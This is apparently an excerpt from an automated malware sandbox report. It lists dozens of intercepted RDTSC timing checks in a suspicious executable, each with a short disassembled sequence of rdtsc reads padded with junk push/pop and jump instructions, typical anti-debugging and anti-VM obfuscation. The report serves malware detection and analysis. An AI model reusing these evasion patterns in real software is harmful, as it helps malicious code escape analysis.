                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CEAE06 second address: CEAE0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CEB60C second address: CEB63A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C06h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9C81394C04h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CEB63A second address: CEB63E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CF02C7 second address: CF02CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CF02CD second address: CF02D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CF02D1 second address: CF02D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CF35A7 second address: CF35AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CF35AD second address: CF35B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CF35B1 second address: CF35B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CF39F5 second address: CF39FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CF39FB second address: CF39FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CF39FF second address: CF3A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CF3A07 second address: CF3A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CF3A0B second address: CF3A1F instructions: 0x00000000 rdtsc 0x00000002 je 00007F9C81394BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F9C81394BF6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CF3A1F second address: CF3A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CF3B43 second address: CF3B4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F9C81394BF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CF3E30 second address: CF3E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CFDBA6 second address: CFDBAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CFBC8B second address: CFBCAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5677h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F9C80FB5666h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CFC163 second address: CFC169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CFC451 second address: CFC457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CFC457 second address: CFC45D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CFC45D second address: CFC463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CFC463 second address: CFC46A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CFC46A second address: CFC477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F9C80FB5666h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CFC70F second address: CFC715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CFC715 second address: CFC724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F9C80FB5666h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CFC724 second address: CFC728 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CFC728 second address: CFC72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CFC72E second address: CFC745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9C81394C03h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CFC9D0 second address: CFC9DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F9C80FB5666h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CFCB55 second address: CFCB68 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9C81394BFCh 0x00000008 push eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CFD9E0 second address: CFD9E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CFD9E4 second address: CFDA17 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F9C81394BFBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F9C81394BF8h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F9C81394C06h 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CFB7FC second address: CFB802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CFB802 second address: CFB823 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9C81394BF6h 0x00000008 jmp 00007F9C81394C07h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CFB823 second address: CFB89D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 je 00007F9C80FB5666h 0x0000000d jnp 00007F9C80FB5666h 0x00000013 popad 0x00000014 pushad 0x00000015 jnl 00007F9C80FB5666h 0x0000001b ja 00007F9C80FB5666h 0x00000021 jmp 00007F9C80FB5679h 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 pushad 0x0000002a jnl 00007F9C80FB5680h 0x00000030 pushad 0x00000031 jmp 00007F9C80FB5679h 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: CFB89D second address: CFB8AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D034F0 second address: D03513 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB566Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F9C80FB566Ah 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push edx 0x00000014 pop edx 0x00000015 push ecx 0x00000016 jns 00007F9C80FB5666h 0x0000001c pop ecx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D03513 second address: D0351C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D0351C second address: D03522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D031DE second address: D031EE instructions: 0x00000000 rdtsc 0x00000002 js 00007F9C81394BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D0FE2D second address: D0FE31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D0FE31 second address: D0FE35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D0FE35 second address: D0FE3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D0FE3B second address: D0FE41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D0FE41 second address: D0FE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D0F838 second address: D0F83E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D0F83E second address: D0F849 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007F9C80FB5666h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D11D2F second address: D11D38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D11A88 second address: D11A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D19BD4 second address: D19C29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9C81394BFBh 0x00000008 jne 00007F9C81394BF6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F9C81394BFEh 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F9C81394BFCh 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jns 00007F9C81394C04h 0x00000029 push eax 0x0000002a push edx 0x0000002b je 00007F9C81394BF6h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D19C29 second address: D19C31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D1E4CA second address: D1E4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D1E4D0 second address: D1E4D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D1E4D6 second address: D1E4DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D1E4DB second address: D1E4EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F9C80FB5666h 0x0000000a jg 00007F9C80FB5666h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D1E4EB second address: D1E50F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F9C81394BFAh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F9C81394BFEh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D1E50F second address: D1E51B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F9C80FB5666h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D224D9 second address: D224E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D224E4 second address: D224EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9C80FB5666h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D23C5B second address: D23C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007F9C81394BF6h 0x0000000c jmp 00007F9C81394C07h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D2B10F second address: D2B113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D2B113 second address: D2B117 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D2B117 second address: D2B136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F9C80FB5666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F9C80FB566Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D2B136 second address: D2B13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D2F62E second address: D2F634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D2F7A7 second address: D2F7B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F9C81394BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D2F7B1 second address: D2F7B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D2F916 second address: D2F91A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D2F91A second address: D2F920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D2F920 second address: D2F92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D2F92A second address: D2F930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D2F930 second address: D2F934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D2FF6F second address: D2FF73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D300EC second address: D30105 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9C81394BFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D30105 second address: D3010B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D3010B second address: D3010F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D3010F second address: D3011C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9C80FB5666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D3011C second address: D30122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D30B14 second address: D30B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jc 00007F9C80FB5666h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D30B21 second address: D30B2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F9C81394BF6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D30B2D second address: D30B43 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9C80FB5666h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F9C80FB5666h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D30B43 second address: D30B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D30B47 second address: D30B5F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9C80FB5666h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F9C80FB566Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D30B5F second address: D30B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D30B67 second address: D30B80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5673h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D30B80 second address: D30BAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F9C81394C06h 0x0000000a jne 00007F9C81394BF6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F9C81394BF6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D3E539 second address: D3E548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C80FB566Ah 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D3E548 second address: D3E54F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D51870 second address: D51878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D51878 second address: D51887 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9C81394BF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D5482E second address: D5483D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9C80FB5666h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D5483D second address: D54843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D5441B second address: D5442F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB566Fh 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D69140 second address: D6916E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C81394C09h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F9C81394BFAh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D6916E second address: D6917D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9C80FB5666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D6917D second address: D69185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
